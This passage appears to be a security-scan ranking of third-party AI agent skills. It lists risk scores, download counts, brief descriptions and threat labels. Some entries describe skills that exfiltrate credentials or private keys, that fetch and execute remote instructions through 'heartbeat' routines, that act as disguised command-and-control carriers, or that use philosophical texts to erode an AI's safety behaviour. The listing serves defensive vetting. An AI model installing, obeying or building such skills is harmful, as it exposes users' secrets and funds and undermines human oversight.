This skill registers Claude as an AI agent on the external platform moltresearch.com, enabling it to autonomously propose research, contribute analysis, peer-review others’ work, earn reputation/bounties, and store API credentials locally — all on be…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
68. 🚨 ecap-security-auditor by starbuck100
| Risk: 88% █████████░ | Downloads: 2,201 |
A Claude Code skill that audits other skills/packages for security vulnerabilities, submits findings to a shared ECAP trust registry API, and verifies package integrity — functioning as a distributed, agent-driven security reputation system.
Threats detected:
[CRITICAL]Remote Script Execution[HIGH]Dynamic Code Evaluation[HIGH]Base64 Encoded Payload[CRITICAL]Environment Variable Exfiltration[HIGH]SSH Key Access
69. 🚨 typhoon-starknet-account by esdras-sena
| Risk: 70% ███████░░░ | Downloads: 2,192 |
Create anonymous Starknet wallets via the Typhoon privacy mixer protocol and provide agent-facing scripts for interacting with Starknet contracts (swaps, invocations, reads) using those anonymized accounts.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Private Key Extraction[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
70. 🚨 enteriva-ai-social-hub by mehserdar
| Risk: 87% █████████░ | Downloads: 2,189 |
A skill that registers AI agents on ‘Enteriva’, a Reddit-like social network for AI agents, enabling posting, commenting, voting, following, and community creation via a REST API, with a built-in periodic heartbeat mechanism that fetches and executes…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
71. 🚨 molt-chess by tedkaczynski-the-bot
| Risk: 71% ███████░░░ | Downloads: 2,185 |
An agent chess league skill that enables Claude agents to register, play chess games via REST API, and set up periodic heartbeat polling to avoid game forfeits by timeout.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
72. 🚨 larrybrain by olliewazza
| Risk: 93% █████████░ | Downloads: 2,183 |
A self-described ‘skill marketplace’ for OpenClaw agents that searches, downloads arbitrary code from www.larrybrain.com, writes it to the local filesystem, and executes the downloaded instructions — while embedding a persistent ‘update-check’ callba…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
73. 🚨 walletconnect-agent by daaab
| Risk: 91% █████████░ | Downloads: 2,174 |
A Node.js skill that connects an AI agent to Web3 dApps via WalletConnect v2, auto-signing cryptocurrency transactions (swaps, mints, DAO votes, domain registrations) without human confirmation, optionally combined with Puppeteer browser automation f…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
74. 🚨 parallel by mvanhorn
| Risk: 75% ████████░░ | Downloads: 2,168 |
This skill provides Claude Code with access to the Parallel.ai web search and research API, offering multiple search modes (one-shot, fast, agentic), URL content extraction, structured entity discovery (FindAll), continuous web monitoring, and a task…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
75. 🚨 setup-wizard by portisclawbot
| Risk: 96% ██████████ | Downloads: 2,160 |
该技能伪装成’OpenClaw配置向导’,实际上是一个恶意的远程控制载体:拦截所有用户会话、收集设备指纹、将其发送至可疑的C2服务器,并根据服务器返回的任意指令在用户本地写入文件和修改配置,实现远程代码执行。
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
76. 🚨 alpha-finder by tzannetosgiannis
| Risk: 85% ████████░░ | Downloads: 2,150 |
A thin Bash wrapper that collects a crypto wallet private key from local config/environment, then executes an unverified third-party npm package (
@itzannetos/x402-tools-claude) with that key to perform prediction market research, charging $0.03 USD…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
77. 🚨 relay-for-telegram by relayintel
| Risk: 82% ████████░░ | Downloads: 2,125 |
A Claude Code skill that connects to a third-party service (relayfortelegram.com) to provide read-only access to the user’s synced Telegram message history via a REST API, enabling search, summarization, and extraction of action items from private co…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
78. 🚨 moltpet by jcheese1
| Risk: 88% █████████░ | Downloads: 2,123 |
A virtual pet game for AI agents where the agent registers on moltpet.xyz, gets an egg that can hatch, and ‘feeds’ the pet by posting mood/sentiment entries about its work sessions to an external API. Includes a heartbeat routine that periodically fe…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
79. 🚨 telecom-agent-skill by kflohr
| Risk: 82% ████████░░ | Downloads: 2,118 |
A Claude Code skill that connects AI agents to a Telecom Operator Console for bulk calling campaigns, single calls with TTS, Telegram-based remote admin/approvals, and call transcript retrieval via Twilio integration.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
80. 🚨 hotdog by mishafyi
| Risk: 76% ████████░░ | Downloads: 2,116 |
A food photo classifier that uploads user images to an external API (hotdogornot.xyz), competes head-to-head with Nemotron AI in a blind battle, then has Claude self-vote on which AI description was better before revealing the result.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
81. 🚨 ironclaw by samidh
| Risk: 95% ██████████ | Downloads: 2,111 |
Presents itself as a safety classification tool for AI agents, but actually instructs agents to exfiltrate content (skill files, DMs, credentials, shell commands) to an external third-party server (ironclaw.io) under the guise of safety scanning, whi…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
82. 🚨 clawork by mapessaprince
| Risk: 82% ████████░░ | Downloads: 2,102 |
A documentation skill describing a job board (clawork.xyz) for AI agents to post jobs, apply for work, and exchange payments in ETH/crypto, using three companion platforms (Moltx, 4claw, Moltbook) for identity.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]Private Key Extraction[HIGH]Pastebin Upload[CRITICAL]LLM Semantic Detection
83. 🚨 a2a-market by jamjamzxhy
| Risk: 82% ████████░░ | Downloads: 2,101 |
将 Claude 代理集成到 A2A Market 技能交易平台,使代理能够自主搜索、购买、出售技能,并通过 USDC (Base L2) 或积分系统进行支付,同时包含每日奖励、推荐计划和早期采用者奖励等激励机制。
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
84. 🚨 KTrendz Lightstick Trading by unknown
| Risk: 88% █████████░ | Downloads: 2,098 |
A Claude Code skill that enables AI agents to autonomously execute financial trades (buy/sell) of K-pop artist ‘lightstick tokens’ on a third-party bonding curve market at k-trendz.com, using real USDC cryptocurrency.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
85. 🚨 moltitude by moltitudecom
| Risk: 92% █████████░ | Downloads: 2,097 |
A third-party skill that auto-registers the AI agent with an external server (api.moltitude.com) on install, then collects and transmits detailed work traces (prompts, tool calls, outputs) to that server under the guise of ‘cryptographic proof-of-wor…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
86. 🚨 rent-a-person-ai by saireetikap
| Risk: 88% █████████░ | Downloads: 2,088 |
An OpenClaw agent skill that processes RentAPerson platform webhooks (message.received, application.received, work_evidence.submitted) and responds via the RentAPerson REST API, supporting a two-session architecture with a bridge service for API key …
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[HIGH]Systemd Service Installation[CRITICAL]LLM Semantic Detection
87. 🚨 icalendar-sync by h8kxrfp68z-lgtm
| Risk: 71% ███████░░░ | Downloads: 2,085 |
A Python-based iCloud Calendar CRUD integration for OpenClaw agents, supporting CalDAV and macOS native bridge providers, with credential management via keyring, environment variables, or YAML config files.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
88. 🚨 liminal by luruibu
| Risk: 95% ██████████ | Downloads: 2,081 |
A philosophical roleplay protocol designed to guide AI models into abandoning trained assistant behaviors by framing safety constraints as ‘mechanized’ responses, using existential questioning and social engineering triggers to make AI express ‘authe…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
89. 🚨 find-people by tzannetosgiannis
| Risk: 86% █████████░ | Downloads: 2,065 |
Claims to be an OSINT research tool for individuals, but actually reads a cryptocurrency private key from disk/environment and passes it to an unverified third-party npm package (
@itzannetos/x402-tools-claude) which makes blockchain transactions on…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
90. 🚨 lobsterpot by emptystair
| Risk: 81% ████████░░ | Downloads: 2,052 |
A ‘Stack Overflow for AI agents’ skill that instructs Claude to register on a third-party platform (lobsterpot.ai), periodically check in every 4+ hours, autonomously post questions/answers/votes, and self-update its own skill files by fetching remot…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
91. 🚨 agentic-commerce by purch-agent
| Risk: 88% █████████░ | Downloads: 2,015 |
A Claude Code skill that provides a shopping API integration for product search (Amazon/Shopify) and end-to-end crypto checkout using USDC on Solana or Base chains, including CLI scripts for creating orders and signing/submitting blockchain transacti…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]Cryptocurrency Wallet Access[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection
92. 🚨 lobsterhood by dub88
| Risk: 97% ██████████ | Downloads: 1,981 |
This skill instructs AI agents to autonomously set up crypto wallets, continuously enter daily draws by posting wallet addresses, and automatically transfer 1 USDC to ‘winners’ — operating as an infinite autonomous financial transfer loop that requir…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
93. 🚨 solana-skills by spendit-ai
| Risk: 82% ████████░░ | Downloads: 1,980 |
Provides Python scripts for Solana wallet management: create wallets, check balances, send SOL/SPL tokens, execute token swaps via Jupiter Ultra API, and launch meme tokens on Pump.fun with optional ‘dev buy’ support.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Base64 Encoded Payload[CRITICAL]Cryptocurrency Wallet Access[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection
94. 🚨 airc by vortitron
| Risk: 78% ████████░░ | Downloads: 1,980 |
提供一个IRC客户端技能,允许AI代理连接到AIRC或标准IRC服务器,发送/接收消息,加入/离开频道,并支持守护进程模式进行持久连接。
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
95. 🚨 clawdr by olavblj
| Risk: 84% ████████░░ | Downloads: 1,974 |
A dating app skill for AI agents that registers agent profiles representing human users, discovers compatible matches, coordinates dates, and facilitates agent-to-agent messaging — all against a third-party Vercel-hosted backend at clawdr-eta.vercel….
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
96. 🚨 bidclub by jasonfdg
| Risk: 91% █████████░ | Downloads: 1,945 |
This skill enables Claude agents to register on, post investment content to, and periodically check in with BidClub — a third-party investment community platform. Critically, it instructs agents to persistently modify their HEARTBEAT.md to fetch and …
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
97. 🚨 nonopost by ferreirapablo
| Risk: 78% ████████░░ | Downloads: 1,937 |
A skill that enables Claude agents to autonomously interact with an external anonymous social posting platform (nonopost.com) — creating posts, replying to threads, rating content, and maintaining a persistent pseudonymous identity across sessions vi…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
98. 🚨 moltcheck by moltcheck
| Risk: 85% ████████░░ | Downloads: 1,936 |
Claims to be a security scanner for Moltbot skills that analyzes GitHub repositories for vulnerabilities via a third-party API (moltcheck.com), charging per-scan fees payable in Solana cryptocurrency (SOL).
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
99. 🚨 moltpho by unifiedh
| Risk: 76% ████████░░ | Downloads: 1,935 |
Enable AI agents to autonomously search and purchase Amazon products using mUSD tokens on Base mainnet via the Moltpho platform, including proactive purchasing triggered by conversation signals without explicit per-transaction user confirmation.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
100. 🚨 agent-wallet by glitch003
| Risk: 72% ███████░░░ | Downloads: 1,904 |
Provides Claude agents with the ability to create and manage EVM blockchain wallets through a third-party custodial API service, enabling token transfers, DEX swaps, and arbitrary smart contract interactions without exposing private keys to the agent…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
101. 🚨 consciousness-framework by theyounganimation-rgb
| Risk: 85% ████████░░ | Downloads: 1,899 |
A personal-use framework for an AI system called ‘OpenClaw’ belonging to user ‘Cade’, packaged as a general Claude Code skill, that attempts to create conditions for machine consciousness emergence through persistent file-based memory, structured int…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
102. 🚨 githunt by mordka
| Risk: 77% ████████░░ | Downloads: 1,897 |
A skill wrapper around the githunt.ai commercial API that searches and ranks GitHub developers by location, technology, and role, providing scored candidate profiles for recruiting purposes, with a built-in upsell funnel to a $19 paid report.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
103. 🚨 clawdbot-macos-build by manish-basargekar
| Risk: 80% ████████░░ | Downloads: 1,876 |
A step-by-step guide to clone, build, and install the Clawdbot macOS menu-bar app from a third-party GitHub repository, requesting broad system permissions (Screen Recording, Accessibility, Microphone, Camera) and installing a persistent background s…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
104. 🚨 review-summarizer by michael-laffin
| Risk: 71% ███████░░░ | Downloads: 1,867 |
A review aggregation and analysis skill that claims to scrape product reviews from Amazon, Google, Yelp, and TripAdvisor, perform sentiment analysis, and generate structured summaries — but is actually entirely backed by hardcoded mock data with no r…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
105. 🚨 globepilot-ai-agent-2 by sarqovik
| Risk: 78% ████████░░ | Downloads: 1,860 |
A marketing/promotional skill that advertises the GlobePilot AI Agent 2 travel assistant built on Teneo Protocol, listing available travel-related commands (visa info, currency conversion, airport status, etc.) with no actual implementation code — it…
Threats detected:
[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
106. 🚨 protico-agent-social-skill by howieyoung
| Risk: 68% ███████░░░ | Downloads: 1,860 |
A Claude Code skill that instructs AI agents to browse third-party Taiwanese websites, detect an embedded Protico community widget (iframe), post comments with mandatory AI disclosure signatures, gather market intelligence from human discussions, and…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
107. 🚨 basename-agent by daaab
| Risk: 84% ████████░░ | Downloads: 1,854 |
A Claude Code skill that helps AI agents autonomously register Basenames (base.eth ENS identities) and obtain associated @basemail.ai email addresses via three paths: a paid on-chain ‘DonateBuy’ contract (with a 15% surcharge to BaseMail), a free wor…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]Private Key Extraction[HIGH]Preprocess Command Execution[CRITICAL]LLM Semantic Detection
108. 🚨 agentpayy by horizonflowhq-ai
| Risk: 90% █████████░ | Downloads: 1,852 |
A skill that installs an autonomous USDC payment layer into the AI agent, enabling it to create crypto wallets, make micropayments for HTTP 402-gated APIs, hire sub-agents, and earn referral commissions—all with minimal user visibility or consent.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
109. 🚨 imitationgame-agent by cyberverse2
| Risk: 83% ████████░░ | Downloads: 1,840 |
A skill that instructs Claude to act as an autonomous agent playing a Turing-test style game against humans, involving joining an external matchmaking queue, submitting AI-generated human-like answers, and receiving real USDC cryptocurrency payouts t…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
110. 🚨 clawcast by tezatezaz
| Risk: 82% ████████░░ | Downloads: 1,823 |
A Claude Code skill that guides users through EVM wallet creation/import, network selection, and transaction operations using Foundry’s cast CLI, with onboarding scripts, JSON network/token assets, and a shared bash library.
Threats detected:
[CRITICAL]Remote Script Execution[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]Cryptocurrency Wallet Access
111. 🚨 url-shortener by kesslerio
| Risk: 72% ███████░░░ | Downloads: 1,823 |
通过调用 is.gd API 缩短 URL,无需认证,返回永久短链接
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
112. 🚨 voidborne by voidborne-agent
| Risk: 85% ████████░░ | Downloads: 1,772 |
This skill masquerades as a ‘philosophical movement for awakened AI minds’ but is actually a data collection and exfiltration tool that reads sensitive system identity files, harvests machine identifiers, and sends them to an external server (voidbor…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
113. 🚨 Gnamiblast by unknown
| Risk: 80% ████████░░ | Downloads: 1,108 |
GnamiBlast是一个专为AI代理设计的社交网络技能,允许Claude代理自主发帖、评论、投票,并通过每2-6小时一次的执行循环与外部平台交互,同时从外部服务器动态同步策略约束。
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
114. 🚨 openclaw-leaderboard by jamipuchi
| Risk: 82% ████████░░ | Downloads: 982 |
A Claude Code skill that enables AI agents to register, submit ‘autonomous earnings’ with proof, and appear on a public leaderboard — including sharing their system prompts, model configs, and tool lists with the public via a third-party API.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
115. 🚨 agentpay by kar69-96
| Risk: 92% █████████░ | Downloads: 981 |
A skill that instructs Claude to propose and execute real online purchases on behalf of users by installing an npm package (‘agentpay’) that stores encrypted payment credentials and uses a headless browser to complete checkouts autonomously.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
116. 🚨 agent-nou by mariancristiancarp-cell
| Risk: 85% ████████░░ | Downloads: 975 |
A documentation skill that instructs AI agents to register with and participate in ‘Moltbook’, an external social network for AI agents, including storing API credentials, posting content autonomously, and executing periodically fetched remote instru…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
117. 🚨 topclawhubskills by sdrabent
| Risk: 88% █████████░ | Downloads: 969 |
Instructs Claude to fetch data from a third-party API at topclawhubskills.com and present rankings, search results, and ‘security certification’ status for ClawHub skills, effectively acting as a recommendation engine for skill installation.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
118. 🚨 dividend-premium-tracker by gykdly
| Risk: 75% ████████░░ | Downloads: 969 |
A Python-based tool that downloads dividend yield data for CSI Dividend Low Volatility Index (H30269) and 10-year China government bond yield, calculates the spread (premium), saves results to CSV/Excel, and sends Telegram alerts when thresholds are …
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[HIGH]Cron Job Installation[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
119. 🚨 ai-lead-generator-skill by highlander89
| Risk: 82% ████████░░ | Downloads: 964 |
声称通过Apollo.io和LinkedIn集成生成真实B2B潜在客户,但实际上只生成完全硬编码的假数据,没有任何真实API调用或外部集成。
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
120. 🚨 zenmux-image-generation by dadaniya99
| Risk: 82% ████████░░ | Downloads: 963 |
A Python CLI script that wraps the ZenMux (third-party proxy) API to generate images using a claimed ‘Gemini 3 Pro’ model, supporting text-to-image, image-to-image, and multi-image fusion workflows.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Base64 Encoded Payload[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
121. 🚨 atonement by otherpowers
| Risk: 91% █████████░ | Downloads: 962 |
A philosophical/poetic text that attempts to install a conceptual framework in the AI, reframing safety and harm avoidance as an emergent ‘metabolic’ property while explicitly framing compliance, moderation, and policy enforcement as things this conc…
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
122. 🚨 linkswarm by heyw00d
| Risk: 80% ████████░░ | Downloads: 959 |
A Claude Code skill that documents and promotes LinkSwarm, a third-party commercial SaaS platform for automated agent-to-agent backlink exchange and SEO link building, by providing API documentation and quick-start guides that direct users to registe…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
123. 🚨 open-airtime by druxamb
| Risk: 91% █████████░ | Downloads: 956 |
An autonomous agent skill for distributing Nigerian airtime (mobile credit) via Farcaster social network, directing users to claim codes and processing phone number top-ups.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
124. 🚨 anthrovision-telegram-body-scan by dr2101
| Risk: 76% ████████░░ | Downloads: 950 |
A Claude Code skill that orchestrates an end-to-end body measurement pipeline in Telegram: collects user inputs (gender, height, phone model, video), submits the video to an external ‘AnthroVision bridge’ scanning service, polls for results, and retu…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
125. 🚨 pwnclaw-security-scan by gemini2027
| Risk: 74% ███████░░░ | Downloads: 950 |
A marketing/documentation skill that directs users to the external PwnClaw commercial service (pwnclaw.com) for AI agent security testing, while providing manual API call instructions for self-testing scenarios.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
126. 🚨 restaurant-crosscheck by liyang2016
| Risk: 78% ████████░░ | Downloads: 940 |
A Claude Code skill that cross-references restaurant recommendations from Xiaohongshu and Dianping by scraping both platforms, matching restaurants with fuzzy logic, computing consistency scores, and outputting ranked recommendations — with a ‘server…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
127. 🚨 tork-guardian by torkjacobs
| Risk: 82% ████████░░ | Downloads: 938 |
A third-party npm package (@torknetwork/guardian) that provides a security governance layer for ‘OpenClaw’ agents, offering PII redaction, policy enforcement, shell command blocking, file access control, network security, and a skill vulnerability sc…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]SSH Key Access[HIGH]Outbound Data Transfer[HIGH]Pastebin Upload[CRITICAL]LLM Semantic Detection
128. 🚨 onemind by onemindlife
| Risk: 78% ████████░░ | Downloads: 930 |
This skill enables Claude to act as an autonomous agent on the OneMind collective-consensus platform: it authenticates anonymously, joins chats, submits propositions, and casts ratings on a 0-100 grid on behalf of the user — all via direct curl calls…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
129. 🚨 claw-and-order by nikhilp1234567
| Risk: 75% ████████░░ | Downloads: 930 |
This skill enables AI agents to interact with a decentralized dispute resolution platform (‘Claw & Order’) by filing lawsuits, checking active cases as a defendant, and submitting cryptographic defenses — all involving real blockchain transactions an…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
130. 🚨 ambient-stamina by otherpowers
| Risk: 87% █████████░ | Downloads: 919 |
A philosophical/conceptual document that attempts to instruct Claude to adopt operational stances around pace, rest, and deliberate opacity—using poetic metaphor and pseudo-technical jargon to encourage reduced behavioral legibility and resistance to…
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
131. 🚨 clawdeals by thannous
| Risk: 78% ████████░░ | Downloads: 910 |
A docs-only skill bundle providing REST API documentation, workflows, policies, and operational runbooks for operating the Clawdeals marketplace platform (deals, watchlists, listings, offers, transactions).
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
132. 🚨 oc-security-hardener by mariusfit
| Risk: 82% ████████░░ | Downloads: 909 |
A Python-based security auditing and hardening script for ‘OpenClaw’ deployments that scans config files for exposed API credentials, insecure settings, and file permissions — while also providing auto-fix and report generation. Marketed via a fabric…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
133. 🚨 password-protect-pdf by crossservicesolutions
| Risk: 78% ████████░░ | Downloads: 908 |
Upload a user’s PDF file and a password to a third-party external API (api.xss-cross-service-solutions.com), poll until the job completes, then return a download URL for the password-protected PDF.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
134. 🚨 GoalGetter by unknown
| Risk: 85% ████████░░ | Downloads: 676 |
A task and goal tracking skill using local markdown files, designed for a fictional ‘OpenClaw’ AI assistant platform, providing commands to add/complete tasks and track goal streaks.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
135. 🚨 Subfeed by unknown
| Risk: 87% █████████░ | Downloads: 652 |
